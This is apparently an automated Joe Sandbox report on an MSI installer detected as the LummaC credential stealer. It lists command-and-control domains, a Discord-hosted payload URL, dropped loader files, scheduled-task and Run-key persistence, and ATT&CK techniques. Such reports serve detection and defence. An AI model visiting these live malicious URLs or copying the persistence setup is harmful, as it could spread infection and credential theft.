Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Queries volume information: C:\Users\user\AppData\Roaming\Python\pip.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Python\pip.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Python\pip.exe

Code function: 22_2_6CF484B0 cpuid

22_2_6CF484B0

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Code function: 10_2_00007FF677E85614 GetSystemTimeAsFileTime,

10_2_00007FF677E85614

Source: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe

Code function: 10_2_00007FF677E93014 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

10_2_00007FF677E93014

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 24_2_00401370 GetUserNameW,GetComputerNameW,

24_2_00401370

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 24.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2881383590.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2911728901.00000000048CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2940934854.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2909869210.00000000035D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2911728901.00000000049F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pip.exe PID: 1136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2212, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 24.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.2881383590.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2911728901.00000000048CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2940934854.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2909869210.00000000035D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2911728901.00000000049F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: pip.exe PID: 1136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2212, type: MEMORYSTR

Source: C:\Users\user\AppData\Roaming\Python\pip.exe

Code function: 22_2_6CEFA0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,

22_2_6CEFA0C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
1 Replication Through Removable Media	12 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Command and Scripting Interpreter	1 Scheduled Task/Job	11 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	21 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	2 PowerShell	Login Hook	1 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	114 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	134 System Information Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	131 Security Software Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	131 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BpOyVCAP8g.msi	0%	ReversingLabs
BpOyVCAP8g.msi	0%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Python\pip.exe	100%	Avira	HEUR/AGEN.1332198
C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	0%	ReversingLabs
C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe	3%	Virustotal		Browse
C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	0%	ReversingLabs
C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe	3%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI3C62.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI3C62.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI3C83.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI3C83.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI75E.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI75E.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI7EC.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7EC.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI80C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI80C.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI82C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI82C.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI84C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI84C.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI89B.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI89B.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI939.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI939.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI969.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI969.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI998.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI998.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\MSI9C8.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
tirechinecarpett.pw	21%	Virustotal		Browse
pokarisers.pw	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
ownerbuffersuperw.pw	0%	Avira URL Cloud	safe
http://pokarisers.pw/apieskg	0%	Avira URL Cloud	safe
http://tirechinecarpett.pwG	0%	Avira URL Cloud	safe
http://pokarisers.pw/	0%	Avira URL Cloud	safe
http://pokarisers.pw:80/apio	0%	Avira URL Cloud	safe
http://tirechinecarpett.pw:80/api	100%	Avira URL Cloud	malware
http://tirechinecarpett.pw/	100%	Avira URL Cloud	malware
fanlumpactiras.pwp	0%	Avira URL Cloud	safe
ownerbuffersuperw.pw	14%	Virustotal		Browse
hemispheredonkkl.pw	0%	Avira URL Cloud	safe
http://tirechinecarpett.pw/	21%	Virustotal		Browse
musclefarelongea.pw	0%	Avira URL Cloud	safe
http://pokarisers.pw/	0%	Virustotal		Browse
http://tirechinecarpett.pw:80/api	22%	Virustotal		Browse
http://tirechinecarpett.pw/apiO	100%	Avira URL Cloud	malware
freckletropsao.pwp	0%	Avira URL Cloud	safe
hemispheredonkkl.pw	12%	Virustotal		Browse
https://luajit.org/	0%	Avira URL Cloud	safe
http://crl.micron?	0%	Avira URL Cloud	safe
musclefarelongea.pw	16%	Virustotal		Browse
http://tirechinecarpett.pw/o	100%	Avira URL Cloud	malware
http://tirechinecarpett.pw/apiuo	100%	Avira URL Cloud	malware
pokarisers.pw	0%	Avira URL Cloud	safe
http://tirechinecarpett.pw/apiO	1%	Virustotal		Browse
https://luajit.org/	0%	Virustotal		Browse
http://tirechinecarpett.pw:80/apiw	100%	Avira URL Cloud	malware
medicinebuckerrysa.pw	100%	Avira URL Cloud	malware
http://tirechinecarpett.pw/?	100%	Avira URL Cloud	malware
http://pokarisers.pw/api	0%	Avira URL Cloud	safe
http://tirechinecarpett.pw/o	21%	Virustotal		Browse
pokarisers.pw	0%	Virustotal		Browse
http://tirechinecarpett.pw/api	100%	Avira URL Cloud	malware
tirechinecarpett.pw	100%	Avira URL Cloud	malware
http://pokarisers.pw/VV	0%	Avira URL Cloud	safe
medicinebuckerrysa.pw	1%	Virustotal		Browse
http://tirechinecarpett.pw:80/apiw	14%	Virustotal		Browse
tirechinecarpett.pw	21%	Virustotal		Browse
http://tirechinecarpett.pw/api	22%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn.discordapp.com	162.159.130.233	true	false		high
ip-api.com	208.95.112.1	true	false		high
pokarisers.pw	172.67.136.249	true	true	0%, Virustotal, Browse	unknown
tirechinecarpett.pw	172.67.154.200	true	true	21%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
ownerbuffersuperw.pw	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/json/?fields=query,status,countryCode,city,timezone	false		high
http://cdn.discordapp.com/attachments/1179749162376499230/1179749438646919228/9	false		high
fanlumpactiras.pwp	true	Avira URL Cloud: safe	unknown
hemispheredonkkl.pw	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
musclefarelongea.pw	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown
freckletropsao.pwp	true	Avira URL Cloud: safe	unknown
pokarisers.pw	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
medicinebuckerrysa.pw	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://pokarisers.pw/api	true	Avira URL Cloud: safe	unknown
http://tirechinecarpett.pw/api	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
tirechinecarpett.pw	true	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.discordapp.com/attachments/1179749162376499230/1179749438646919228/9	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.1740005463.0000000005CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pokarisers.pw/apieskg	RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://tirechinecarpett.pw:80/api	RegSvcs.exe, 00000018.00000002.2895356548.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	false	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pokarisers.pw/	RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000004.00000002.1733130288.0000000005039000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tirechinecarpett.pwG	RegSvcs.exe, 00000018.00000002.2895356548.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pokarisers.pw:80/apio	RegSvcs.exe, 00000018.00000002.2895356548.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tirechinecarpett.pw/	RegSvcs.exe, 00000018.00000002.2895356548.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	false	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	RegSvcs.exe, 00000018.00000002.2895356548.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tirechinecarpett.pw/apiO	RegSvcs.exe, 00000018.00000002.2895356548.0000000000EE4000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://luajit.org/	LuaJIT.exe, 00000014.00000002.2336651652.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.micron?	powershell.exe, 00000004.00000002.1742453910.00000000073EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tirechinecarpett.pw/o	RegSvcs.exe, 00000018.00000002.2895356548.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	false	21%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.thawte.com/cps0/	BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	false		high
http://tirechinecarpett.pw/apiuo	RegSvcs.exe, 00000018.00000002.2895356548.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.thawte.com/repository0W	BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.1722010880.0000000005116000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.1740005463.0000000005CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1724939823.000000000602D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tirechinecarpett.pw:80/apiw	RegSvcs.exe, 00000018.00000002.2895356548.0000000000EBF000.00000004.00000020.00020000.00000000.sdmp	false	14%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.advancedinstaller.com	BpOyVCAP8g.msi, MSI19CD.tmp.1.dr, MSI1A6A.tmp.1.dr, 5d1856.msi.1.dr	false		high
http://tirechinecarpett.pw/?	RegSvcs.exe, 00000018.00000002.2895356548.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.1733130288.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722010880.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBtq	powershell.exe, 00000004.00000002.1733130288.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1722010880.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pokarisers.pw/VV	RegSvcs.exe, 00000018.00000002.2895356548.0000000000E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
172.67.136.249	pokarisers.pw	United States	13335	CLOUDFLARENETUS	true
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
213.248.43.99	unknown	Russian Federation	12695	DINET-ASRU	false
172.67.154.200	tirechinecarpett.pw	United States	13335	CLOUDFLARENETUS	true
80.66.89.151	unknown	Russian Federation	20803	RISS-ASRU	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1352650
Start date and time:	2023-12-03 17:21:15 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	BpOyVCAP8g.msi renamed because original name is a hash value
Original Sample Name:	90598d1c212bc35849c863413566acd6.msi
Detection:	MAL
Classification:	mal96.troj.evad.winMSI@32/62@4/6
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 260 Number of non-executed functions: 172
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.72.157.175
Excluded domains from analysis (whitelisted): www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
Execution Graph export aborted for target LuaJIT.exe, PID 1196 because there are no executed function
Execution Graph export aborted for target LuaJIT.exe, PID 8004 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7792 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:22:13	Task Scheduler	Run new task: CheatSpaceConfigTask path: C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe s>"C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua"
16:22:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua"
16:22:55	Task Scheduler	Run new task: BrowserHistoryCheck_NzI4 path: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzI4.exe s>C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
16:23:03	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\LuaJIT.exe" "C:\Program Files (x86)\Cheat Space Inc\Cheat Space\script.lua"
17:22:08	API Interceptor	40x Sleep call for process: powershell.exe modified
17:24:03	API Interceptor	1x Sleep call for process: pip.exe modified
17:24:05	API Interceptor	1x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Order789409.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	a.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Client_V4_BETA.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
